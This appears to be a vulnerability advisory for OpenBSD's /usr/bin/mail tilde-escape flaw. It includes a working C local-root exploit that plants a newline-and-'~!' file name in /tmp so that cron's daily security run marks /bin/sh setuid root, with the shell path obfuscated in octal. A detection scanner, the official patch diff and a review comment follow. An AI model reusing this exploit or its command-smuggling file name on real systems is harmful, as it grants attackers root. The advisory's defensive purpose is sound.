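Affected systems
OpenBSD <3.0
Detailed description
/usr/bin/mail in OpenBSD has a vulnerability in how it handles the escape sequence ~! in non-interactive mode: an arbitrary command appended after it is executed with the privileges of the user running mail, and through cron jobs this can lead to privilege escalation to root.
Test code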
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include <fcntl.h>
#include <unistd.h>
int main(void)
{
    int fd;
    chdir("/tmp");
    fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
    if (fd >= 0) /* open() returns -1 on failure, not 0 */
        close(fd);
    return 0;
}
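A defender-side check for the condition the test code above sets up, added here as an example (it is not code from the original advisory or from OpenBSD): it flags directory entries whose names contain a newline immediately followed by the mail escape character, which is what turns a file listing piped to mail into a `~!` line. The function names, the default directory `/tmp` and the default escape `~` are assumptions of this example.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if `name` contains a newline directly followed by `escape`,
 * i.e. printing the name into a report would start a new line with the
 * escape character. Only lines after an embedded newline are checked;
 * the assumption is that reports print names after a directory prefix. */
int injects_escape_line(const char *name, char escape)
{
    const char *p = name;

    while ((p = strchr(p, '\n')) != NULL) {
        p++;                      /* first byte of the next "line" */
        if (*p == escape)
            return 1;
    }
    return 0;
}

/* Count entries in `dir` whose names would inject an escape line and print
 * each one with control bytes replaced by '?', so that the output of this
 * tool is itself safe to put in a report. Returns -1 if `dir` cannot be
 * opened. */
int scan_dir(const char *dir, char escape)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    int hits = 0;

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL) {
        if (!injects_escape_line(e->d_name, escape))
            continue;
        hits++;
        printf("%s/", dir);
        for (const char *p = e->d_name; *p != '\0'; p++)
            putchar(((unsigned char)*p < 0x20 || *p == 0x7f) ? '?' : *p);
        putchar('\n');
    }
    closedir(d);
    return hits;
}

int main(int argc, char **argv)
{
    int n = scan_dir(argc > 1 ? argv[1] : "/tmp", '~');
    return n < 0 ? 2 : n > 0;     /* exit 1 when something was flagged */
}
```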
Solution
Patch download:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Index: collect.c
===================================================================
RCS file: /cvs/src/usr.bin/mail/collect.c,v
retrieving revision 1.23
retrieving revision 1.24
diff -u -r1.23 -r1.24
--- collect.c 2001/11/21 15:26:39 1.23
+++ collect.c 2002/04/08 20:27:17 1.24
@@ -1,4 +1,4 @@
-/* $OpenBSD: collect.c,v 1.23 2001/11/21 15:26:39 millert Exp $ */
+/* $OpenBSD: collect.c,v 1.24 2002/04/08 20:27:17 millert Exp $ */
/* $NetBSD: collect.c,v 1.9 1997/07/09 05:25:45 mikel Exp $ */
/*
@@ -38,7 +38,7 @@
#if 0
static const char sccsid[] = "@(#)collect.c 8.2 (Berkeley) 4/19/94";
#else
-static const char rcsid[] = "$OpenBSD: collect.c,v 1.23 2001/11/21 15:26:39 millert Exp $";
+static const char rcsid[] = "$OpenBSD: collect.c,v 1.24 2002/04/08 20:27:17 millert Exp $";
#endif
#endif /* not lint */
@@ -161,7 +161,8 @@
value("interactive") != NULL && !lastlong &&
(value("dot") != NULL || value("ignoreeof") != NULL))
break;
- if (linebuf[0] != escape || lastlong) {
+ if (linebuf[0] != escape || value("interactive") == NULL ||
+ lastlong) {
if (putline(collf, linebuf, !longline) < 0)
goto err;
continue; |
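Review bot: the new `value("interactive") == NULL` test in the `if (linebuf[0] != escape || ...)` condition carries no comment, so nothing in the code says that tilde escapes are deliberately ignored for non-interactive input; please add a one-line comment above the `if` stating that, so a later cleanup does not fold the check away. The same `value("interactive")` lookup already appears in the dot/ignoreeof test just above in this hunk's context; reading it once into a local would keep the two tests consistent, and it is worth confirming where that variable gets set, since this check is only as strong as that variable.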